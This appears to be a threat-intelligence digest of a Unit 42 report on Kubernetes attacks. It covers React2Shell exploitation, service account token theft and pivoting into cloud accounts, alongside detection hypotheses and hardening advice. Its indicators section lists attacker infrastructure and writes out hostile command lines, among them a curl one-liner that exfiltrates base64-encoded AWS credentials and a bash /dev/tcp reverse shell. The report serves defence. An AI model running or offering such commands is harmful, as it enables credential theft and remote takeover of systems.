Skip to content
.ca
sign in
6 mincritical

Understanding Current Threats to Kubernetes Environments

Threat actors are increasingly targeting Kubernetes environments by exploiting vulnerabilities like React2Shell and misconfigurations to steal service account tokens. These stolen identities are then used to escalate privileges and move laterally into backend cloud infrastructure, leading to severe impacts such as cryptocurrency theft.

Sens:ImmediateConf:highAnalyzed:2026-04-07reports

Authors: Unit 42

ActorsSlow PiscesTeamTNTSCARLETEELVoidLinkTeamPCP
React2ShellCVE-2025-55182Token TheftSlow PiscesKubernetes

Source:Palo Alto Networks

IOCs · 2

Key Takeaways

  • Kubernetes-related threat operations increased 282% over the last year, heavily targeting the IT sector.
  • Threat actors like Slow Pisces are stealing Kubernetes service account tokens to pivot into broader cloud infrastructure.
  • The React2Shell vulnerability (CVE-2025-55182) is being actively exploited to gain RCE in containers and steal cloud credentials.
  • Attackers frequently use open-source tools like Peirates and custom malware like VoidLink and TeamPCP for automated token harvesting.
  • Defenders must enforce strict RBAC, use short-lived projected tokens, and monitor Kubernetes audit logs and runtime behavior.

Affected Systems

  • Kubernetes
  • Cloud Infrastructure (AWS, GCP, Azure)
  • React Server Components (RSC)

Vulnerabilities (CVEs)

  • CVE-2025-55182

Attack Chain

Attackers gain initial access via spear-phishing or exploiting public-facing vulnerabilities like React2Shell (CVE-2025-55182) to achieve remote code execution in a Kubernetes pod. Once inside, they enumerate the environment and extract the mounted service account token from /var/run/secrets/kubernetes.io/serviceaccount/token. Using this token, they authenticate to the Kubernetes API to escalate privileges, enumerate secrets, and deploy backdoors. Finally, they use the stolen identities to pivot into the broader cloud infrastructure, accessing backend systems and exfiltrating sensitive data or financial assets.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: Yes
  • Platforms: Cortex XQL, Palo Alto Networks Threat Prevention

The article provides a Cortex XQL query to detect service account token exfiltration via curl/wget. It also lists Cortex alert names mapped to MITRE techniques and mentions Threat Prevention signatures for CVE-2025-55182.

Detection Engineering Assessment

EDR Visibility: High — EDR/XDR agents on Kubernetes nodes can monitor container runtime behavior, including unexpected process execution (e.g., curl/wget reading token files) and reverse shells. Network Visibility: Medium — Network visibility can detect outbound connections to C2 servers or unusual API requests, but internal pod-to-pod or pod-to-API traffic might be encrypted or difficult to inspect without specific CNI integrations. Detection Difficulty: Moderate — While the actions (reading files, executing curl) are simple, distinguishing malicious token reads from legitimate pod operations requires baseline understanding and correlation of events.

Required Log Sources

  • Kubernetes Audit Logs
  • Container Runtime Logs
  • Cloud Trail / Cloud Audit Logs
  • Process Execution Logs

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for processes like curl or wget reading the /var/run/secrets/kubernetes.io/serviceaccount/token file and immediately making outbound network connections.Process Execution Logs, Network LogsCredential AccessLow
Identify anonymous or unexpected IP addresses authenticating to the Kubernetes API server.Kubernetes Audit LogsDiscovery/Lateral MovementMedium
Monitor for the creation of pods with sensitive volume mounts or in sensitive namespaces by unusual identities.Kubernetes Audit LogsPrivilege EscalationMedium

Control Gaps

  • Disabled Kubernetes Audit Logs
  • Overly permissive RBAC roles
  • Long-lived service account tokens
  • Lack of runtime container monitoring

Key Behavioral Indicators

  • Unexpected shell execution inside containers
  • Reads of service account tokens by non-orchestration processes
  • Outbound HTTP requests containing base64-encoded environment variables or credentials

False Positive Assessment

  • Medium

Recommendations

Immediate Mitigation

  • Identify and patch applications vulnerable to React2Shell (CVE-2025-55182).
  • Review and restrict overly permissive RBAC roles and ClusterRoleBindings.
  • Enable Kubernetes Audit Logging if currently disabled.

Infrastructure Hardening

  • Implement short-lived, projected service account tokens.
  • Enforce Pod Security Standards (PSS), specifically the Restricted profile.
  • Isolate workloads and namespaces to limit lateral movement.

User Protection

  • Deploy runtime protection (XDR) to Kubernetes nodes to monitor and block malicious container behavior.
  • Secure developer workstations to prevent initial access via spear-phishing.

Security Awareness

  • Train cloud operations and development teams on the risks of social engineering and credential theft.
  • Educate teams on secure Kubernetes configurations and the principle of least privilege.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1528 - Steal Application Access Token
  • T1552.001 - Unsecured Credentials: Credentials In Files
  • T1552.005 - Unsecured Credentials: Cloud Instance Metadata API
  • T1552.007 - Unsecured Credentials: Container API
  • T1613 - Container and Resource Discovery
  • T1609 - Container Administration Command
  • T1134 - Access Token Manipulation
  • T1610 - Deploy Container
  • T1611 - Escape to Host
  • T1078.001 - Valid Accounts: Default Accounts
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1098.006 - Account Manipulation: Additional Container Cluster Roles

Additional IOCs

  • Ips:
    • 104[.]238[.]149[[.]]198 - Exfiltration C2
    • 45[.]76[.]155[[.]]14 - Payload hosting
    • 23[.]235[.]188[[.]]3 - Payload hosting
    • 38[.]162[.]112[.]141 - Reverse shell destination IP observed in process telemetry
  • Urls:
    • hxxp://104[.]238[.]149[[.]]198:12349/BVN0VEdddye5odDFVR - Exfiltration endpoint
    • hxxp://45[.]76[.]155[[.]]14/vim - Fake vim backdoor URL
    • hxxp://23[.]235[.]188[[.]]3:653/get[.]sh - Payload URL
  • File Hashes:
    • 05eac3663d47a29da0d32f67e10d161f831138e10958dcd88b9dc97038948f69 (SHA256) - VoidLink Binary
    • 7d2c9b4a3942f6029d2de7f73723b505b64caa8e1763e4eb1f134360465185d0 (SHA256) - TeamPCP proxy.sh
    • bb470a803b6d7b12fb596d2e4a18ea9ca91f40fd34ded7f01a487eed9a1d814d (SHA256) - TeamPCP kube.py
    • 7ebfc53f17925af4340d4218aafd16ba39b5afa8b6ac1f7adc3dd92952a2a237 (SHA256) - Reverse shell bash process observed in telemetry
  • File Paths:
    • /var/run/secrets/kubernetes.io/serviceaccount/token - Targeted Kubernetes service account token path
    • /tmp/vim - Dropped backdoor path
  • Command Lines:
    • Purpose: Exfiltrate AWS credentials via base64 encoding | Tools: curl, base64, cat | Stage: Exfiltration | curl http://<ip>:<port>/<path>?<param>=cat ./.aws/credentials | base64 -w 0``
    • Purpose: Download and execute fake vim backdoor | Tools: wget, chmod, nohup | Stage: Execution/Persistence
    • Purpose: Download and execute shell script | Tools: wget, curl, bash | Stage: Execution
    • Purpose: Exfiltrate Kubernetes token via HTTP header | Tools: curl, cat | Stage: Exfiltration
    • Purpose: Establish reverse shell | Tools: bash | Stage: Execution/C2 | bash -c bash -i >& /dev/tcp/<ip>/<port> 0>&1

Related